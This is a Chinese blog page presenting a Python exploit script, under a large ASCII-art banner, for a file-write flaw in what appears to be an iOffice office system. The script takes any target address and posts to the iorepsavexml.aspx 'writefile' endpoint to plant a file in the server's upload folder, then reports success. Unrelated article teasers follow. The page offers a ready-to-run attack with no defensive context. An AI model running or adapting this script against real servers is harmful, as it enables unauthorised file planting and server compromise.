漏洞利用exp[banner]

源码

import requestsbanner = """________________________________________________/                                                \\|    _________________________________________     ||   |\033[1;39m            _,.                          \033[00m|    ||   |\033[1;39m          ,` -.)                         \033[00m|    ||   |\033[1;39m         ( _/-\\-._                       \033[00m|    ||   |\033[1;39m        /,|`--._,-^|           \033[1;31m,¡\033[00m        \033[00m|    ||   |\033[1;39m        \\_| |`-._/||          / \033[1;31m/\033[00m        \033[00m|    ||   |\033[1;39m          |  `-, / |         /  \033[1;31m/\033[00m        \033[00m|    ||   |\033[1;39m          |     || |        /  \033[1;31m/\033[00m         \033[00m|    ||   |\033[1;39m           `r-._||/   __   /  \033[1;31m/\033[00m          \033[00m|    ||   |\033[1;39m       __,-<_     )`-/  `./  \033[1;31m/\033[00m           \033[00m|    ||   |\033[1;39m      '  \\   `---'     \\ /  \033[1;31m/\033[00m            \033[00m|    ||   |\033[1;39m          |           |./  \033[1;31m/\033[00m             \033[00m|    ||   |\033[1;39m          /            /  \033[1;31m/\033[00m              \033[00m|    ||   |\033[1;39m      \\_/' \\       |  /  \033[1;31m/\033[00m               \033[00m|    ||   |\033[1;39m       |    |   _,^-'/  \033[1;31m/\033[00m                \033[00m|    ||   |\033[1;39m       |    , `` (\\ /  /_     黑暗骑士   \033[00m|    ||   |\033[1;39m        (  /   `-._//^`                  \033[00m|    ||   |\033[1;39m         `Y-.____(__}                    \033[00m|    ||   |\033[1;39m          |     {__)                     \033[00m|    ||   |\033[1;39m                 ()                      \033[00m|    ||   |_________________________________________|    ||                                                  |\_________________________________________________/\___________________________________/____________________________________________-'    .-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.  --- `-__-'.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.--.  .-.-.`-__-'.-.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-`__`. .-.-.-.`-__-'.-.-.-.-. .-----.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-----. .-.-.-.-.`-__-'.-.-.-.-.-. .---.-. .-------------------------. .-.---. .---.-.-.-.`-_
:-------------------------------------------------------------------------:
`---._.-------------------------------------------------------------._.---'
"""
print(banner)ip = input(":")
# 定义目标URL和请求参数
url = ip + '/ioffice/prg/set/report/iorepsavexml.aspx?key=writefile&filename=poc.txt&filepath=/upfiles/rep/pic/'# 设定请求头
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0','Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8','Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3','Accept-Encoding': 'gzip, deflate','Cookie': 'ASP.NET_SessionId=lcluwirkrcqj42iuxfvafoq4',  # 注意:这里的Cookie值可能需要根据实际情况修改'DNT': '1','Upgrade-Insecure-Requests': '1','Content-Type': 'application/x-www-form-urlencoded','Connection': 'close'
}data = 'poc'  # 或者例如:data = 'param1=value1&param2=value2'response = requests.post(url, headers=headers, data=data)if response.status_code == 200:  print(f"[+] {ip} 漏洞存在")  
else:  print(f"[-] {ip} 漏洞不存在")

执行效果

上传成功

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.xdnf.cn/news/11625.html

如若内容造成侵权/违法违规/事实不符,请联系一条长河网进行投诉反馈,一经查实,立即删除!

相关文章

MYSQL视图

MYSQL视图

由于我们上讲复习了前面的所有知识点&#xff0c;所以今天不再去复习之前的知识了&#xff0c;我们直接开始正题。 1.什么是视图&#xff1f; 视图是⼀个虚拟的表&#xff0c;它是基于⼀个或多个基本表或其他视图的查询结果集。视图本⾝不存储数 据&#xff0c;⽽是通过执⾏查…
阅读更多...
【软件设计师中级】2024.11.09软考备考

【软件设计师中级】2024.11.09软考备考

备考时候的一些笔记&#xff0c;可能会有不对或者个人主观的知识点 文章目录 前言一、计算机内数据的表示1.1 原反补移码1.2 浮点数1.3 校验码1.3.1奇偶校验1.3.2 CRC冗余校验码(理解特点即可)1.3.3 海明校验码 二、 计算机系统组成2.1 冯诺依曼结构2.2 Flynn分类法2.3 指令系统…
阅读更多...
springboot生成二维码和条形码

springboot生成二维码和条形码

目录 springboot生成二维码和条形码引入依赖生成二维码&#xff0c;在controller层生成条形码controller springboot生成二维码和条形码 引入依赖 <dependency><groupId>com.google.zxing</groupId><artifactId>core</artifactId><version&…
阅读更多...
RTSP播放器EasyPlayer.js无插件直播流媒体音视频播放器使用http与https的区别

RTSP播放器EasyPlayer.js无插件直播流媒体音视频播放器使用http与https的区别

在当今数字化时代&#xff0c;视频播放体验的重要性日益凸显&#xff0c;而EasyPlayer.js无插件H5播放器作为一款现代Web环境下的播放器&#xff0c;其对HTTP和HTTPS的支持成为了许多用户关注的焦点。本文将探讨EasyPlayer.js播放器在使用HTTP与HTTPS时的区别。 1、从安全性角度…
阅读更多...
组态软件基础知识

组态软件基础知识

一、组态软件基础知识 1、概述 &#xff08;1&#xff09;、组态软件概念与产生背景 “组态”的概念是伴随着集散型控制系统&#xff08;Distributed Control System简称DCS&#xff09;的出现才开始被广大的生产过程自动化技术人员所熟知的。在工业控制技术的不断发…
阅读更多...
国标GB28181公网直播EasyGBS国标GB28181视频平台与海康GB28181对接需要做哪些测试?

国标GB28181公网直播EasyGBS国标GB28181视频平台与海康GB28181对接需要做哪些测试?

在当今的视频监控系统中&#xff0c;国标GB28181协议已成为视频监控设备互联互通的标准。特别是在公网直播的应用场景中&#xff0c;国标GB28181公网直播EasyGBS国标GB28181视频平台与海康威视设备的对接显得尤为重要。为了确保对接的顺利进行&#xff0c;需要进行一系列详尽的…
阅读更多...
SpringBoot使用TraceId日志链路追踪

SpringBoot使用TraceId日志链路追踪

项目场景&#xff1a; 有时候一个业务调用链场景&#xff0c;很长&#xff0c;调了各种各样的方法&#xff0c;看日志的时候&#xff0c;各个接口的日志穿插&#xff0c;确实让人头大。为了解决这个痛点&#xff0c;就使用了TraceId&#xff0c;根据TraceId关键字进入服务器查询…
阅读更多...
【QML】QML图表(ChartView)改变坐标轴(ValueAxis)标题(titleText)的文字颜色

【QML】QML图表(ChartView)改变坐标轴(ValueAxis)标题(titleText)的文字颜色

1. 需求 改变titleText的颜色&#xff0c;将下图mV的颜色改为红色 2.代码 关键代码&#xff1a;titleText: "<font colorred>mV</font>" //坐标轴 mv ValueAxis{id: _mAxisMvmin: 0max: 20tickCount: 6labelsFont.pixelSize: 15labelFormat: %.1ft…
阅读更多...
mysql诡异查询

mysql诡异查询

运营同事让查一个数量&#xff0c;结果这两种情况查的居然不一致。 带时分秒查询的是另一个数&#xff0c;没有时分秒是上面的&#xff0c;少了100多条数据&#xff0c;为什么&#xff0c;有路过的大神可以指点一二。
阅读更多...
丹摩征文活动|快速上手 CogVideoX-2b:智谱清影 6 秒视频生成部署教程

丹摩征文活动|快速上手 CogVideoX-2b:智谱清影 6 秒视频生成部署教程

文章目录 一、生成视频效果 二、CogVideoX 技术新起点三、CogVideoX 上手部署3.1 创建丹摩实例3.2 配置环境和依赖3.3 模型与配置文件3.4 运行3.5 问题与处理方法 四、CogVideoX-2b 用创新点燃未来 一、生成视频效果 A street artist, clad in a worn-out denim jacket and a c…
阅读更多...
仓库管理系统的实施流程超全解析!

仓库管理系统的实施流程超全解析!

现在我们都能很清楚地知道&#xff0c;在企业管理中仓库管理系统&#xff08;WMS&#xff09;扮演着非常重要的角色。而且随着电子商务的迅猛发展和供应链管理的复杂化&#xff0c;企业对仓库管理的要求越来越高。那么&#xff0c;如何有效地实施一个仓库管理系统&#xff0c;成…
阅读更多...
【K8S问题系列 | 10】在K8S集群怎么查看各个pod占用的资源大小?【已解决】

【K8S问题系列 | 10】在K8S集群怎么查看各个pod占用的资源大小?【已解决】

要查看 Kubernetes 集群中各个 Pod 占用的资源大小&#xff08;包括 CPU 和内存&#xff09;&#xff0c;可以使用以下几种方法&#xff1a; 1. 使用 kubectl top 命令 kubectl top 命令可以快速查看当前 Pod 的 CPU 和内存使用情况。需要确保已安装并配置了 Metrics Server。…
阅读更多...
YOLO即插即用模块---MEGANet

YOLO即插即用模块---MEGANet

MEGANet: Multi-Scale Edge-Guided Attention Network for Weak Boundary Polyp Segmentation 论文地址&#xff1a; 解决问题&#xff1a; 解决方案细节&#xff1a; 解决方案用于目标检测&#xff1a; 即插即用代码&#xff1a; 论文地址&#xff1a; https://arxiv.org…
阅读更多...
测试求职个人简历案例参考

测试求职个人简历案例参考

当涉及到测试求职个人简历时&#xff0c;关键是突出你在测试领域的技能和经验。以下是一个例子&#xff0c;它包含了简历的常见部分&#xff0c;以突出测试方面的专业知识和个人成就。 基本信息 姓名&#xff1a;XXX 电话&#xff1a;123456789 邮箱&#xff1a;jianli100chui.…
阅读更多...
Chromium Mojo(IPC)进程通信演示 c++(3)

Chromium Mojo(IPC)进程通信演示 c++(3)

122版本自带的mojom通信例子channel-associated-interface 仅供学习参考&#xff1a; codelabs\mojo_examples\03-channel-associated-interface-freezing 其余定义参考上一篇文章&#xff1a; Chromium Mojo(IPC)进程通信演示 c&#xff08;2&#xff09;-CSDN博客​​​​…
阅读更多...
如何使用SparkSQL在hive中使用Spark的引擎计算

如何使用SparkSQL在hive中使用Spark的引擎计算

在hive中&#xff0c;由于hive自带的计算引擎计算比较慢&#xff0c;这个时候可以使用spark替换hive的计算引擎&#xff0c;可以增加hive的计算速度。 在替换之前&#xff0c;首先虚拟机上要有spark的集群模式&#xff0c;spark 的yarn集群模式&#xff0c;需要hdfs&#xff0…
阅读更多...
MySQL数据库: 初始MySQL +Navicat (学习笔记)

MySQL数据库: 初始MySQL +Navicat (学习笔记)

目录 一&#xff0c;MySQL数据库基本概念 1&#xff0c;数据 2&#xff0c;数据库 3&#xff0c;数据库管理系统 4&#xff0c;数据库应用程序 5&#xff0c;数据库管理员 6&#xff0c;最终用户 7&#xff0c;数据库系统 二&#xff0c;MySQL数据库的分类 1&#xf…
阅读更多...
22.04Ubuntu---ROS2创建python节点

22.04Ubuntu---ROS2创建python节点

创建工作空间 mkdir -p 02_ros_ws/src 然后cd到该目录 创建功能包 在这条命令里&#xff0c;tom就是你的功能包 ros2 pkg create tom --build-type ament_python --dependencies rclpy 可以看到tom功能包已经被创建成功了。 使用tree命令&#xff0c;得到如下文件结构 此时…
阅读更多...
多模态大模型技术方向和应用场景

多模态大模型技术方向和应用场景

多模态大模型&#xff08;Multimodal Large Language Models&#xff0c;MLLM&#xff09;是一种结合了大型语言模型&#xff08;LLM&#xff09;和大型视觉模型&#xff08;LVM&#xff09;的深度学习模型&#xff0c;它们能够处理和理解多种类型的数据&#xff0c;如文本、图…
阅读更多...
力扣 LeetCode 977. 有序数组的平方

力扣 LeetCode 977. 有序数组的平方

解题思路&#xff1a; 方法一&#xff1a;先平方再快排 方法二&#xff1a;双指针 因为可能有负数&#xff0c;所以对于一个数组 [ -5 , -3 , 0 , 2 , 4 ] 可以从两边向内靠拢&#xff0c;最大值一定出现在两端 设置指针 i 和指针 j 分别从左右两边靠拢 因为要从小到大排序…
阅读更多...
最新文章

Copyright @ 2022~2023